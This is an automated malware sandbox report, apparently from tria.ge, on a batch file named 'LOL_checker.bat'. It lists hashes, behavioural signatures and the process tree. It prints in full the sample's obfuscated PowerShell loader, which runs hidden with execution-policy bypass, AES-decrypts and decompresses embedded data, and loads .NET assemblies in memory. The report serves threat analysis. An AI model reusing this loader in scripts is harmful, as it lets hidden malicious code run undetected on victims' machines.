Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
10s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
02/05/2023, 07:49
Static task
static1
Behavioral task
behavioral1
Sample
LOL_checker.bat
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
LOL_checker.bat
Resource
win10v2004-20230220-en
General
-
Target
LOL_checker.bat
-
Size
13.5MB
-
MD5
f7863fbcae244fa731b8b7d1e29bfb83
-
SHA1
44f01e8ad60e9f8c9830e256af0cab44796a0c06
-
SHA256
a0f43c5748ada07a12af81dda2460045030f936a8d5081f3a403f85c2a9668f8
-
SHA512
2f28b3d2d6bf51d0bac1aae84114bfcfc99218a0310c7ac95c8e34a04efe3f1fd37821b566483099e47ea693fa453290cfa82393bae48dfdfd933bbc34db0a8c
-
SSDEEP
49152:xn+XTjaklourM+8cnw+LP8HLTbQuUftwWx/njk4HI/GyIAGrtVtbsuhpcy8Jl5sl:O
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2000 LOL_checker.bat.exe -
Loads dropped DLL 1 IoCs
pid Process 1256 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2000 LOL_checker.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2000 LOL_checker.bat.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1256 wrote to memory of 2000 1256 cmd.exe 29 PID 1256 wrote to memory of 2000 1256 cmd.exe 29 PID 1256 wrote to memory of 2000 1256 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\LOL_checker.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Users\Admin\AppData\Local\Temp\LOL_checker.bat.exe"LOL_checker.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function DQmdf($GcQSI){ $MLWPM=[System.Security.Cryptography.Aes]::Create(); $MLWPM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MLWPM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MLWPM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jnElpKi3YXgWFDU7pRsJ29FkGHhv7uNvwUu22mGWA88='); $MLWPM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AiYws6YSgygGmwuUkwYnTg=='); $vdfPb=$MLWPM.CreateDecryptor(); $return_var=$vdfPb.TransformFinalBlock($GcQSI, 0, $GcQSI.Length); $vdfPb.Dispose(); $MLWPM.Dispose(); $return_var;}function Jxcvo($GcQSI){ $ZkRsx=New-Object System.IO.MemoryStream(,$GcQSI); $isvCW=New-Object System.IO.MemoryStream; $xcnTt=New-Object System.IO.Compression.GZipStream($ZkRsx, [IO.Compression.CompressionMode]::Decompress); $xcnTt.CopyTo($isvCW); $xcnTt.Dispose(); $ZkRsx.Dispose(); $isvCW.Dispose(); $isvCW.ToArray();}function WwkcJ($GcQSI,$gLxyw){ $xyGVN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$GcQSI); $rMLKn=$xyGVN.EntryPoint; $rMLKn.Invoke($null, $gLxyw);}$rZFEd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\LOL_checker.bat').Split([Environment]::NewLine);foreach ($crFGN in $rZFEd) { if ($crFGN.StartsWith(':: ')) { $kQmAw=$crFGN.Substring(3); break; }}$nzheQ=[string[]]$kQmAw.Split('\');$fCDTP=Jxcvo (DQmdf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($nzheQ[0])));$MFOxB=Jxcvo (DQmdf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($nzheQ[1])));WwkcJ $MFOxB (,[string[]] (''));WwkcJ $fCDTP (,[string[]] (''));2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2000
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d